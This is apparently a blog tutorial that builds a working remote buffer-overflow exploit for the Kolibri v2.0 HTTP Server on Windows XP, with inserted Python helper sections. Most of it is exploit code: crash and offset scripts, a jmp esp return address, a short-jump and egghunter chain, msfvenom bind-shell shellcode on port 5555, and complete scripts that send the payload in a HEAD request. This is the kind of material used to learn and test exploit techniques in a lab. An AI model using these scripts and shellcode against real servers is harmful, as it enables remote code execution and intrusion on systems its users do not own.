Kolibri v2.0 HTTP Server

Posted by vincebye


Prerequisites

Environment

  • Windows XP Pro

  • Immunity debugger

  • mona.py

  • Python 2.7

  • the vulnerable software (Kolibri v2.0 HTTP Server)

  • bad characters: '\x00\x0d\x0a\x3d\x20\x3f'

Egg hunter

Egg hunting: used when the overflowed buffer is too small to hold the shellcode. Control is first redirected to a small egghunter stub (32 bytes here), which searches memory for a tag placed in front of the shellcode and then jumps to the shellcode wherever it landed.

Reproducing the vulnerability

Generating the egghunter

!mona egg

Egghunter , tag w00t :
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Put this tag in front of your shellcode : w00tw00t
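As an added example (my own code, not from the original post and not mona's), here is a Python 3 model of what those 32 bytes do at run time. Memory is a constructed dict of 4 KiB pages; a page missing from the dict plays the part of an unmapped address, where the hunter's int 0x2e probe (syscall 2, NtAccessCheckAndAuditAlarm on XP) reports an access violation and the hunter skips the whole page instead of crashing. The two-page layout and the int3 bytes standing in for shellcode are made up for the demo.

```python
# Python 3 model of the !mona egg hunter (tag w00t). Not mona's code.
PAGE = 0x1000
EGG = b"w00t"

# The hunter bytes from `!mona egg`, with what each instruction does:
#   66 81 ca ff 0f   or dx,0xfff        ; edx -> last byte of its page
#   42               inc edx            ; edx -> first byte of the next page
#   52               push edx           ; keep edx across the syscall
#   6a 02 58         push 2 ; pop eax   ; NtAccessCheckAndAuditAlarm (XP syscall 2)
#   cd 2e            int 0x2e           ; probe: is memory at edx readable?
#   3c 05            cmp al,5           ; low byte of STATUS_ACCESS_VIOLATION
#   5a               pop edx
#   74 ef            je <or dx,0xfff>   ; unmapped -> skip the whole page
#   b8 77 30 30 74   mov eax,"w00t"
#   8b fa            mov edi,edx
#   af               scasd              ; [edi] == "w00t" ? edi += 4
#   75 ea            jne <inc edx>      ; no -> try the next byte
#   af               scasd              ; second copy of the tag
#   75 e7            jne <inc edx>
#   ff e7            jmp edi            ; edi -> byte after "w00tw00t"
HUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)


def read(memory, addr, n):
    """Read n bytes starting at addr, crossing pages; None if any byte is unmapped."""
    out = b""
    while len(out) < n:
        base = addr & ~(PAGE - 1)
        page = memory.get(base)
        if page is None:
            return None
        off = addr - base
        chunk = page[off:off + (n - len(out))]
        out += chunk
        addr += len(chunk)
    return out


def hunt(memory, start=0, limit=0x7FFF0000):
    """Return the address the hunter jumps to (just past w00tw00t), or None."""
    # entry goes straight into "or dx,0xfff ; inc edx": begin at the next page
    edx = (start | (PAGE - 1)) + 1
    while edx < limit:
        if read(memory, edx, 1) is None:        # int 0x2e reported access violation
            edx = (edx | (PAGE - 1)) + 1        # or dx,0xfff ; inc edx
            continue
        if read(memory, edx, 8) == EGG + EGG:   # scasd ; scasd both matched
            return edx + 8                      # jmp edi
        edx += 1                                # jne -> inc edx
    return None


def demo_memory():
    """Constructed address space: the overflowed stack page holds the hunter
    (which contains ONE copy of w00t, the immediate of its mov eax), then a gap
    of unmapped pages, then the page holding the User-Agent header with the
    doubled tag and four int3 bytes standing in for shellcode."""
    stack = (b"A" * 478 + HUNTER).ljust(PAGE, b"\x00")
    heap = (b"User-Agent: " + EGG + EGG + b"\xcc\xcc\xcc\xcc").ljust(PAGE, b"\x00")
    return {0x00010000: stack, 0x00120000: heap}


def demo():
    """Run the hunt: the single w00t inside the hunter is skipped, the doubled tag is found."""
    memory = demo_memory()
    target = hunt(memory, start=0, limit=0x00130000)
    return target, (None if target is None else read(memory, target, 4))


if __name__ == "__main__":
    addr, first_bytes = demo()
    print(f"hunter lands at {addr:#x}, first bytes there: {first_bytes!r}")
```

The model shows why the tag is doubled: the hunter's own code carries one "w00t", so a single-tag search would find the hunter itself first. The real hunter also returns with edi pointing at the byte after the second tag, which is why the shellcode must follow w00tw00t immediately.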

Crash the program with the following PoC:

#!/usr/bin/python
import socket

# 600 bytes in the request path is enough to overwrite EIP
Stage1 = "A"*600
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()

Replace "A"*600 with a pattern_create string to locate the offsets:

msf5 > /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 600
[*] exec: /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 600

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9

[image]

From the crash, the EIP offset is 515 and the ESP offset is 519 (ESP points at the 4 bytes immediately after the return address).

So the new padding is: A*515 + [EIP] + BBBB...
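Added example, not part of the original post: a Python 3 reimplementation of pattern_create and pattern_offset, so the offsets can be checked without Metasploit. The screenshot with the register values is not reproduced on this page, so the EIP value 0x32724131 used below is derived from the page's offset 515 (the pattern bytes "1Ar2" at 515..518 read little-endian) and is an assumption in that sense, as is "Ar3A" for the bytes at ESP.

```python
import string


def _triples():
    """Aa0, Aa1, ..., Aa9, Ab0, ... : the unique 3-byte units of the pattern."""
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                yield (up + lo + dg).encode()


def pattern_create(length):
    """Same output as Metasploit's pattern_create.rb -l <length> (up to 20280 bytes)."""
    out = bytearray()
    for t in _triples():
        if len(out) >= length:
            break
        out += t
    return bytes(out[:length])


def pattern_offset(pattern, value):
    """Offset of a 4-byte register value inside the pattern, or -1.

    An int is searched as the little-endian bytes it was loaded from; bytes
    (for example what the debugger dumps at ESP) are searched as-is.
    """
    if isinstance(value, int):
        value = value.to_bytes(4, "little")
    return pattern.find(value)


def crash_offsets(length=600):
    """Reproduce the numbers the post reads from the debugger.

    The register contents are assumptions derived from the post's offsets:
    EIP = 0x32724131 is "1Ar2" read little-endian, and "Ar3A" is what a
    dump at ESP would show.
    """
    pat = pattern_create(length)
    eip_offset = pattern_offset(pat, 0x32724131)
    esp_offset = pattern_offset(pat, b"Ar3A")
    space_after_esp = length - esp_offset      # bytes left for code after jmp esp
    return eip_offset, esp_offset, space_after_esp


if __name__ == "__main__":
    print("EIP offset %d, ESP offset %d, %d bytes after ESP" % crash_offsets())
```

The third number is the 81 bytes the post later finds too small for the shellcode; it falls straight out of 600 - 519.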

Find a trampoline (jmp esp) address

[image]

0x7d5a30d7 : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\WINDOWS\system32\SHELL32.dll)
# little-endian: \xd7\x30\x5a\x7d

The straightforward payload would be: A*515 + '\xd7\x30\x5a\x7d' + shellcode

But only 81 bytes (600 - 519) are left after ESP, probably too little for the shellcode. So instead use a short backward jump to an egghunter placed earlier in the buffer, and let the egghunter locate and execute the shellcode.

Payload with the short jump: A*515 + '\xd7\x30\x5a\x7d' + "\xEB\xC4"

short jump opcode -> \xEB
displacement -60 bytes -> 0xC4 (the low byte of 0xFFFFFFC4, i.e. -60 as a signed byte)

The displacement is relative to the end of the 2-byte jump. The jump sits at offset 519 (where ESP points), so it lands at 521 - 60 = 461, inside the 'A' padding. 0x41 is `inc ecx`, so execution slides harmlessly through the 17 bytes at 461..477 and into the egghunter at offset 478.

The PoC is now:

#!/usr/bin/python
import socket

# Egghunter from !mona egg, tag w00t (32 bytes)
hunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# hunter at offset 478, jmp esp (SHELL32.dll) at 515, jmp short -60 at 519
Stage1 = "A"*478 + hunter + "A"*5 + "\xd7\x30\x5a\x7d" + "\xEB\xC4"

buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; he; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()

Put a pattern_create string in the User-Agent header to see where it lands in memory:

#!/usr/bin/python
import socket

# Egghunter from !mona egg, tag w00t (32 bytes)
hunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# hunter at offset 478, jmp esp (SHELL32.dll) at 515, jmp short -60 at 519
Stage1 = "A"*478 + hunter + "A"*5 + "\xd7\x30\x5a\x7d" + "\xEB\xC4"
# Stage2 goes into the User-Agent header (pattern_create -l 1000)
Stage2 = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"User-Agent: " + Stage2 + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()

Set a breakpoint at 0x7d5a30d7 and search memory for the pattern with !mona: it is found, and there is enough room there to place the shellcode.

[image]

Finally, generate the shellcode (excluding the bad characters) and insert it:

root@ubuntu:/home/vincebye# msfvenom -p windows/shell_bind_tcp LPORT=5555 -f c -b '\x00\x0d\x0a\x3d\x20\x3f'
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] = 
"\xbd\xb6\x17\xbc\xbb\xda\xcd\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x53\x31\x6b\x12\x83\xeb\xfc\x03\xdd\x19\x5e\x4e\xdd\xce\x1c"
"\xb1\x1d\x0f\x41\x3b\xf8\x3e\x41\x5f\x89\x11\x71\x2b\xdf\x9d"
"\xfa\x79\xcb\x16\x8e\x55\xfc\x9f\x25\x80\x33\x1f\x15\xf0\x52"
"\xa3\x64\x25\xb4\x9a\xa6\x38\xb5\xdb\xdb\xb1\xe7\xb4\x90\x64"
"\x17\xb0\xed\xb4\x9c\x8a\xe0\xbc\x41\x5a\x02\xec\xd4\xd0\x5d"
"\x2e\xd7\x35\xd6\x67\xcf\x5a\xd3\x3e\x64\xa8\xaf\xc0\xac\xe0"
"\x50\x6e\x91\xcc\xa2\x6e\xd6\xeb\x5c\x05\x2e\x08\xe0\x1e\xf5"
"\x72\x3e\xaa\xed\xd5\xb5\x0c\xc9\xe4\x1a\xca\x9a\xeb\xd7\x98"
"\xc4\xef\xe6\x4d\x7f\x0b\x62\x70\xaf\x9d\x30\x57\x6b\xc5\xe3"
"\xf6\x2a\xa3\x42\x06\x2c\x0c\x3a\xa2\x27\xa1\x2f\xdf\x6a\xae"
"\x9c\xd2\x94\x2e\x8b\x65\xe7\x1c\x14\xde\x6f\x2d\xdd\xf8\x68"
"\x52\xf4\xbd\xe6\xad\xf7\xbd\x2f\x6a\xa3\xed\x47\x5b\xcc\x65"
"\x97\x64\x19\x13\x9f\xc3\xf2\x06\x62\xb3\xa2\x86\xcc\x5c\xa9"
"\x08\x33\x7c\xd2\xc2\x5c\x15\x2f\xed\x77\x55\xa6\x0b\x1d\x89"
"\xef\x84\x89\x6b\xd4\x1c\x2e\x93\x3e\x35\xd8\xdc\x28\x82\xe7"
"\xdc\x7e\xa4\x7f\x57\x6d\x70\x9e\x68\xb8\xd0\xf7\xff\x36\xb1"
"\xba\x9e\x47\x98\x2c\x02\xd5\x47\xac\x4d\xc6\xdf\xfb\x1a\x38"
"\x16\x69\xb7\x63\x80\x8f\x4a\xf5\xeb\x0b\x91\xc6\xf2\x92\x54"
"\x72\xd1\x84\xa0\x7b\x5d\xf0\x7c\x2a\x0b\xae\x3a\x84\xfd\x18"
"\x95\x7b\x54\xcc\x60\xb0\x67\x8a\x6c\x9d\x11\x72\xdc\x48\x64"
"\x8d\xd1\x1c\x60\xf6\x0f\xbd\x8f\x2d\x94\xcd\xc5\x6f\xbd\x45"
"\x80\xfa\xff\x0b\x33\xd1\x3c\x32\xb0\xd3\xbc\xc1\xa8\x96\xb9"
"\x8e\x6e\x4b\xb0\x9f\x1a\x6b\x67\x9f\x0e";

The final PoC:

#!/usr/bin/python
import socket

# Egghunter from !mona egg, tag w00t (32 bytes)
hunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
# msfvenom windows/shell_bind_tcp LPORT=5555, 355 bytes, bad chars excluded
shellcode=(
"\xbd\xb6\x17\xbc\xbb\xda\xcd\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x53\x31\x6b\x12\x83\xeb\xfc\x03\xdd\x19\x5e\x4e\xdd\xce\x1c"
"\xb1\x1d\x0f\x41\x3b\xf8\x3e\x41\x5f\x89\x11\x71\x2b\xdf\x9d"
"\xfa\x79\xcb\x16\x8e\x55\xfc\x9f\x25\x80\x33\x1f\x15\xf0\x52"
"\xa3\x64\x25\xb4\x9a\xa6\x38\xb5\xdb\xdb\xb1\xe7\xb4\x90\x64"
"\x17\xb0\xed\xb4\x9c\x8a\xe0\xbc\x41\x5a\x02\xec\xd4\xd0\x5d"
"\x2e\xd7\x35\xd6\x67\xcf\x5a\xd3\x3e\x64\xa8\xaf\xc0\xac\xe0"
"\x50\x6e\x91\xcc\xa2\x6e\xd6\xeb\x5c\x05\x2e\x08\xe0\x1e\xf5"
"\x72\x3e\xaa\xed\xd5\xb5\x0c\xc9\xe4\x1a\xca\x9a\xeb\xd7\x98"
"\xc4\xef\xe6\x4d\x7f\x0b\x62\x70\xaf\x9d\x30\x57\x6b\xc5\xe3"
"\xf6\x2a\xa3\x42\x06\x2c\x0c\x3a\xa2\x27\xa1\x2f\xdf\x6a\xae"
"\x9c\xd2\x94\x2e\x8b\x65\xe7\x1c\x14\xde\x6f\x2d\xdd\xf8\x68"
"\x52\xf4\xbd\xe6\xad\xf7\xbd\x2f\x6a\xa3\xed\x47\x5b\xcc\x65"
"\x97\x64\x19\x13\x9f\xc3\xf2\x06\x62\xb3\xa2\x86\xcc\x5c\xa9"
"\x08\x33\x7c\xd2\xc2\x5c\x15\x2f\xed\x77\x55\xa6\x0b\x1d\x89"
"\xef\x84\x89\x6b\xd4\x1c\x2e\x93\x3e\x35\xd8\xdc\x28\x82\xe7"
"\xdc\x7e\xa4\x7f\x57\x6d\x70\x9e\x68\xb8\xd0\xf7\xff\x36\xb1"
"\xba\x9e\x47\x98\x2c\x02\xd5\x47\xac\x4d\xc6\xdf\xfb\x1a\x38"
"\x16\x69\xb7\x63\x80\x8f\x4a\xf5\xeb\x0b\x91\xc6\xf2\x92\x54"
"\x72\xd1\x84\xa0\x7b\x5d\xf0\x7c\x2a\x0b\xae\x3a\x84\xfd\x18"
"\x95\x7b\x54\xcc\x60\xb0\x67\x8a\x6c\x9d\x11\x72\xdc\x48\x64"
"\x8d\xd1\x1c\x60\xf6\x0f\xbd\x8f\x2d\x94\xcd\xc5\x6f\xbd\x45"
"\x80\xfa\xff\x0b\x33\xd1\x3c\x32\xb0\xd3\xbc\xc1\xa8\x96\xb9"
"\x8e\x6e\x4b\xb0\x9f\x1a\x6b\x67\x9f\x0e"
)
# hunter at offset 478, jmp esp (SHELL32.dll) at 515, jmp short -60 at 519
Stage1 = "A"*478 + hunter + "A"*5 + "\xd7\x30\x5a\x7d" + "\xEB\xC4"
# doubled tag followed by the shellcode, delivered in the User-Agent header
Stage2 = "w00tw00t" + shellcode
buffer = (
"HEAD /" + Stage1 + " HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"User-Agent: " + Stage2 + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()

w00t is the tag of the egghunter generated by !mona egg above. It is written twice (w00tw00t) because the hunter itself contains a single copy of w00t (the immediate of its mov eax) and would otherwise match itself; the hunter compares 8 bytes and jumps to the byte right after them, so the shellcode must follow the doubled tag immediately.
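Added example (my own code, not the author's PoC): a Python 3 version of the final payload that computes the jmp short from the offsets instead of hard-coding it, verifies where the jump lands, scans every component for the post's bad characters, and builds the HEAD request as bytes with explicit CRLFs. The stand-in shellcode is four int3 bytes, a constructed placeholder for debugging; the 355-byte msfvenom output above goes in its place for the real run. The function names and the int3 stand-in are my choices.

```python
import socket
import struct

# Bad characters listed in the post (NUL, CR, LF, '=', space, '?').
BADCHARS = b"\x00\x0d\x0a\x3d\x20\x3f"

# 32-byte egghunter from `!mona egg` (tag w00t), as on the page.
HUNTER = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
TAG = b"w00t"
JMP_ESP = 0x7D5A30D7       # jmp esp in SHELL32.dll (from the post)
EIP_OFFSET = 515           # from the pattern_offset step on the page
HUNTER_OFFSET = 478        # where the post places the hunter inside the padding

# Constructed stand-in shellcode: int3 breakpoints. With these in place the
# debugger stops the moment the hunter transfers control, which proves the
# egg was found before the real msfvenom payload is dropped in.
SHELLCODE = b"\xcc" * 4


def short_jmp(from_off, to_off):
    """Encode a 2-byte `jmp short` located at from_off that lands on to_off.

    The displacement is relative to the end of the instruction (from_off + 2).
    """
    disp = to_off - (from_off + 2)
    if not -128 <= disp <= 127:
        raise ValueError(f"displacement {disp} out of range for jmp short")
    return b"\xeb" + struct.pack("<b", disp)


def check_clean(name, data):
    """Raise if data contains any bad character; return data unchanged otherwise."""
    hits = sorted(set(data) & set(BADCHARS))
    if hits:
        raise ValueError(f"{name} contains bad chars: {[hex(b) for b in hits]}")
    return data


def build_stage1(land_off=461):
    """'A'*478 + hunter + 'A'*5 + [jmp esp] + jmp short back towards the hunter.

    The post's jmp short (EB C4, displacement -60) lands at offset 461 inside
    the 'A' padding; the default reproduces those exact bytes.
    """
    ret = struct.pack("<I", JMP_ESP)               # little-endian: d7 30 5a 7d
    jmp_off = EIP_OFFSET + 4                       # ESP points right after the return address
    stage1 = (b"A" * HUNTER_OFFSET + HUNTER
              + b"A" * (EIP_OFFSET - HUNTER_OFFSET - len(HUNTER))
              + ret + short_jmp(jmp_off, land_off))
    assert stage1[EIP_OFFSET:EIP_OFFSET + 4] == ret
    return check_clean("stage1", stage1)


def landing_offset(stage1, jmp_off=EIP_OFFSET + 4):
    """Decode the jmp short in stage1 and check that everything between the
    landing point and the hunter is 0x41 (`inc ecx`), a harmless slide."""
    op = stage1[jmp_off]
    disp = struct.unpack("<b", stage1[jmp_off + 1:jmp_off + 2])[0]
    if op != 0xEB:
        raise ValueError("no jmp short at the expected offset")
    land = jmp_off + 2 + disp
    if not 0 <= land <= HUNTER_OFFSET:
        raise ValueError(f"jmp short lands at {land}, not before the hunter")
    if any(b != 0x41 for b in stage1[land:HUNTER_OFFSET]):
        raise ValueError("non-0x41 bytes between landing point and hunter")
    return land


def build_stage2(shellcode=SHELLCODE):
    """Doubled tag followed by the shellcode: what the hunter searches for."""
    return check_clean("stage2", TAG + TAG + shellcode)


def build_request(stage1, stage2, host="127.0.0.1", port=8080):
    """The same HEAD request the post sends, as bytes with explicit CRLFs."""
    lines = [
        b"HEAD /" + stage1 + b" HTTP/1.1",
        b"Host: " + f"{host}:{port}".encode(),
        b"User-Agent: " + stage2,
        b"Keep-Alive: 115",
        b"Connection: keep-alive",
    ]
    return b"\r\n".join(lines) + b"\r\n\r\n"


if __name__ == "__main__":
    s1, s2 = build_stage1(), build_stage2()
    print(f"stage1 {len(s1)} bytes, jmp short lands at offset {landing_offset(s1)}")
    with socket.create_connection(("127.0.0.1", 8080)) as sock:
        sock.sendall(build_request(s1, s2))
```

Running the checks before sending catches the two mistakes that silently break this kind of exploit: a jmp short that lands on something other than the sled or the hunter, and a bad byte (a space or '?' ends the request path, CR/LF ends the header line) that truncates the buffer before it reaches the return address.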

[image]
